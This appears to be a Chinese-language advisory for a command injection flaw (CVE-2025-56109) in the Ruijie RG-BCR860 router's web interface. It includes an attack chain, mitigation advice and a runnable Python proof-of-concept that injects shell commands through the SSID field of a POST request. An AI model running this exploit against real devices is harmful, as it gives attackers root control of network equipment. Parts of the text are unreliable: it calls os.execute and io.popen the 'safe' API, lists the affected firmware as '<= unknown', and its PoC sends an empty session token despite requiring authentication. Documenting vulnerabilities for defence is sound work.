CVE-2025-56109: 锐捷RG-BCR860路由器命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56109

漏洞类型

操作系统命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie RG-BCR RG-BCR860

漏洞概述

CVE-2025-56109是锐捷网络（Ruijie Networks）生产的RG-BCR系列路由器中存在的一个高危操作系统命令注入漏洞。该漏洞位于RG-BCR860设备的Web管理界面，攻击者可以通过向action_wireless端点发送精心构造的POST请求，在设备上执行任意系统命令。由于该漏洞利用门槛较低，攻击复杂度不高，且对机密性、完整性和可用性均有严重影响（CVSS评分8.8），因此具有极高的实际威胁价值。锐捷RG-BCR系列路由器广泛应用于企业网络和公共场所，任何能够访问Web管理界面的攻击者都可以利用此漏洞获取设备完全控制权，可能导致网络中断、数据泄露或进一步的内网横向渗透。

技术细节

该漏洞本质是一个典型的操作系统命令注入（OS Command Injection）问题，存在于Lua编写的Web控制模块中。具体来说，漏洞位于/usr/lib/lua/luci/control/admin/wireless.lua文件的action_wireless函数。该函数在处理用户提交的无线配置参数时，直接将用户输入拼接到系统命令中执行，而未对特殊字符进行充分的过滤或使用安全的API（如os.execute、io.popen等Lua函数的安全替代方案）。攻击者可以在POST请求的参数中注入分号、管道符、反引号等Shell特殊字符，从而打破原有命令边界，注入任意系统命令。由于该接口通常需要低权限认证即可访问（CVSS向量PR:L），这大大降低了攻击难度。成功利用后，攻击者可以在路由器上以root权限执行任意命令，完全控制设备。

攻击链分析

STEP 1

步骤1

扫描目标网络，发现锐捷RG-BCR860路由器，并识别其Web管理界面端口（通常为80或443）

STEP 2

步骤2

获取低权限凭证或利用默认凭证登录Web管理界面，访问无线配置页面

STEP 3

步骤3

构造包含恶意Shell命令的POST请求，将命令注入payload添加到SSID或其他无线参数中

STEP 4

步骤4

向/action_wireless端点发送精心构造的请求，触发命令注入漏洞

STEP 5

步骤5

注入的命令以root权限在路由器上执行，攻击者获得完全控制权

STEP 6

步骤6

攻击者可以部署后门、窃取网络凭据、嗅探流量或进一步横向移动到内网其他设备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-56109 PoC - Ruijie RG-BCR860 Command Injection
# Target: action_wireless endpoint in /usr/lib/lua/luci/control/admin/wireless.lua

def exploit(target_ip, target_port=443, cmd='id'):
    """
    Exploit OS Command Injection in Ruijie RG-BCR860
    
    Args:
        target_ip: Target router IP address
        target_port: Web management port (default: 443)
        cmd: Command to execute on the target
    
    Returns:
        Response from the target
    """
    url = f"https://{target_ip}:{target_port}/cgi-bin/luci/;stok=/admin/wireless"
    
    # Inject command via action_wireless endpoint
    # Using semicolon to chain commands in shell
    injected_cmd = f";{cmd}"
    
    # Prepare POST data with command injection payload
    data = {
        'device': 'radio0',
        'ssid': f'test{injected_cmd}',  # Inject command in SSID field
        'encryption': 'psk2',
        'key': 'test123456',
        'submit': '1'
    }
    
    # Optional: Add authentication if required
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    try:
        response = requests.post(url, data=data, headers=headers, verify=False, timeout=10)
        print(f"[*] Request sent to {url}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response:\n{response.text[:500]}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port] [cmd]")
        print(f"Example: python {sys.argv[0]} 192.168.1.1 443 'id'")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    command = sys.argv[3] if len(sys.argv) > 3 else 'id'
    
    exploit(target, port, command)

影响范围

Ruijie RG-BCR860 固件版本 <= 未知受影响版本

Ruijie RG-BCR 系列多个型号可能受影响

防御指南

临时缓解措施

如果无法立即应用官方补丁，应采取以下临时缓解措施：1）通过防火墙或ACL限制对路由器Web管理界面的访问，仅允许受信任的管理IP地址访问；2）禁用路由器的远程Web管理功能，改为仅允许本地访问；3）监控设备日志，关注异常的POST请求和命令执行行为；4）考虑部署网络入侵检测系统，识别针对action_wireless端点的可疑请求模式；5）如果业务允许，暂时关闭无线功能以减少攻击面。